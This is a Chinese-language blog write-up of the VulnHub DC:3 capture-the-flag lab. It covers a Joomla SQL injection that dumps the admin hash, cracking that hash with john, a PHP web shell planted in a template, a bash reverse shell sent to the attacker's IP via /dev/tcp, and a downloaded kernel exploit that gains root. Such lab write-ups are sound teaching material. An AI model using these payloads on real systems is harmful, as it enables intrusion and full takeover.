[資訊安全] VulnHub – DC: 3 Write-up

終於來到了 DC 系列的第三台,距離農曆春節時間已經不多了,不知道能不能夠完成任務,具之前有位同事短短幾個禮拜內打了幾十台 OSCP 靶機,平均一天打兩到三台,真的覺得實力落差甚大,不過主要困難重重的點在於這個世代有著太多誘惑,廢話不多說,馬上就開始 DC:3 吧。

環境設定

VirtualBox: Kali & DC: 3
Net Config: NAT Network

尋找靶機

Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-24 14:31 CST
Nmap scan report for 10.0.2.6
Host is up (0.0072s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home

目錄爆破

┌──(mksyi㉿kali)-[~/下載/dirsearch]
└─$ python3 dirsearch.py -u http://10.0.2.6/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php,htm,html,sql,zip,tar,rar,7z

  _|. _ _  _  _  _ _|_    v0.4.1        
 (_||| _) (/_(_|| (_| )                                             

Extensions: php, htm, html, sql, zip, tar, rar, 7z | HTTP method: GET | Threads: 30 | Wordlist size: 220520

Error Log: /home/mksyi/下載/dirsearch/logs/errors-21-01-24_14-40-38.log

Target: http://10.0.2.6/                                                                                 
Output File: /home/mksyi/下載/dirsearch/reports/10.0.2.6/_21-01-24_14-40-38.txt

[14:40:38] Starting: 
[14:40:39] 301 -  308B  - /templates  ->  http://10.0.2.6/templates/
[14:40:39] 301 -  304B  - /media  ->  http://10.0.2.6/media/
[14:40:39] 301 -  306B  - /modules  ->  http://10.0.2.6/modules/
[14:40:41] 301 -  302B  - /bin  ->  http://10.0.2.6/bin/
[14:40:42] 301 -  306B  - /plugins  ->  http://10.0.2.6/plugins/
[14:40:42] 301 -  305B  - /images  ->  http://10.0.2.6/images/
[14:40:42] 301 -  307B  - /includes  ->  http://10.0.2.6/includes/
[14:40:43] 301 -  307B  - /language  ->  http://10.0.2.6/language/
[14:40:44] 301 -  309B  - /components  ->  http://10.0.2.6/components/
[14:40:44] 301 -  304B  - /cache  ->  http://10.0.2.6/cache/
[14:40:45] 301 -  308B  - /libraries  ->  http://10.0.2.6/libraries/
[14:40:55] 301 -  302B  - /tmp  ->  http://10.0.2.6/tmp/
[14:40:56] 301 -  306B  - /layouts  ->  http://10.0.2.6/layouts/
[14:41:09] 301 -  312B  - /administrator  ->  http://10.0.2.6/administrator/
[14:42:29] 301 -  302B  - /cli  ->  http://10.0.2.6/cli/
[14:48:17] 403 -  296B  - /server-status

解題過程

DC:3 只有一個 80 Port,瀏覽頁面發現是個 Joomla 的 CMS,然後這次的提示表示與以往不同,該題只有一個 Flag 而已,必須取得 root,估計是找 Joomla 的洞直接取得 root,並且在頁面上可以發現有個帳號為 admin。

Get Shell

由於不知道版本號,所以打起來提升一些麻煩程度,但時間是攻擊者的好朋友,經過一番嘗試發現存在 CVE-2017-8917 弱點,可以被 SQL-Injection 攻擊。

找到線上的 Exploit 找到 admin 的帳戶資料與密碼 Hash 值,但這是 Bcrypt 透過暴力破解會耗費大量的時間,效率不佳,就如同 DC-1 的 Drupal 一樣。

 [-] Fetching CSRF token
 [-] Testing SQLi
  -  Found table: d8uea_users
  -  Found table: users
  -  Extracting users from d8uea_users
 [$] Found user ['629', 'admin', 'admin', '[email protected]', '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu', '', '']
  -  Extracting sessions from d8uea_session
  -  Extracting users from users
  -  Extracting sessions from session

尋找了 joomla 的相關破密方法,並沒有麼突破,最後還是腳踏實地的爆爆看,這邊使用工具 john

echo -ne "\$2y\$10\$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu" > admin.hash
john admin.hash --wordlist /usr/share/wordlists/rockyou.tar

結果竟然爆出來了,密碼為 snoopy。

┌──(mksyi㉿kali)-[~]
└─$ john admin.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
snoopy           (?)
1g 0:00:00:06 DONE (2021-01-24 15:42) 0.1508g/s 21.26p/s 21.26c/s 21.26C/s snoopy..hunter
Use the "--show" option to display all of the cracked passwords reliably
Session completed

由於有預先掃目錄,發現有個可疑路徑 administrator,實際訪問就是 Joomla 的後台。

就由爆破出來的密碼進行登入,並在後台發現 Extensions 底下的 Templates 可以直接編輯 Joomla 檔案。

藉此直接編輯 index.php 上馬。

<?php echo system(@$_GET['a'])?>

之後啟動監聽,並彈個 reverse shell 回來。

nc -nl -p 8080
http://10.0.2.6/templates/protostar/shell.php?a=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.0.2.15%2F8080%200%3E%261%27
  • 這部分折騰很久,因為對於 Joomla 框架不熟,一度以為路徑就是跟目錄底下,結果是在 tmplates 底下,試了半天一直在跟目錄底下找不到自己上傳的馬,被 404 打到臉好種。

提權

現在有 Reverse shell 後,便開始找提權方法。

SUID check

[email protected]:/var/www$ find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
/bin/ping6
/bin/ntfs-3g
/bin/umount
/bin/su
/bin/fusermount
/bin/mount
/bin/ping
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newuidmap
/usr/bin/newgrp

lsb_release

[email protected]:/var/www$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04 LTS
Release:        16.04
Codename:       xenial

uname

[email protected]:/var/www$ uname -a
uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux

CVE-2016-4557

這邊大概掌握到的只有系統版本與核心版本,以 4.4.0-21-generic 為關鍵字搜尋到前幾個 exploit 幾乎沒作用,最後是直接在 Exploit-DB 上找到 39772,從內文的 Source 資訊得到這是 CVE-2016-4557 弱點,並且嘗試用。

[email protected]:/tmp$ cd /tmp

[email protected]:/tmp$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
<-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip            
--2021-01-25 04:35:10--  https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
Resolving github.com (github.com)... 13.114.40.48
Connecting to github.com (github.com)|13.114.40.48|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip [following]
--2021-01-25 04:35:11--  https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.228.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.228.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7025 (6.9K) [application/zip]
Saving to: '39772.zip'

     0K ......                                                100%  172K=0.04s

2021-01-25 04:35:12 (172 KB/s) - '39772.zip' saved [7025/7025]

[email protected]:/tmp$ unzip 39772
unzip 39772
Archive:  39772.zip
   creating: 39772/
  inflating: 39772/.DS_Store         
   creating: __MACOSX/39772/
  inflating: __MACOSX/39772/._.DS_Store  
  inflating: 39772/crasher.tar       
  inflating: __MACOSX/39772/._crasher.tar  
  inflating: 39772/exploit.tar       
  inflating: __MACOSX/39772/._exploit.tar  

[email protected]:/tmp$ cd 39772

[email protected]:/tmp$ ls
crasher.tar
exploit.tar

[email protected]:/tmp/39772$ tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c

[email protected]:/tmp/39772$ cd ebpf_mapfd_doubleput_exploit/

[email protected]:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh
doubleput
doubleput.c
hello
hello.c
suidhelper
suidhelper.c

[email protected]:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
whoami
root

摸索了一陣子,終於取得了 Root,可以在 /root 底下找到 the-flag.txt。

cat /root/the-flag.txt
 __        __   _ _   ____                   _ _ _ _ 
 \ \      / /__| | | |  _ \  ___  _ __   ___| | | | |
  \ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
   \ V  V /  __/ | | | |_| | (_) | | | |  __/_|_|_|_|
    \_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)


Congratulations are in order.  :-)

I hope you've enjoyed this challenge as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!

MksYi

透過網路分享知識的學習者。

發佈留言

發佈留言必須填寫的電子郵件地址不會公開。 必填欄位標示為 *

這個網站採用 Akismet 服務減少垃圾留言。進一步瞭解 Akismet 如何處理網站訪客的留言資料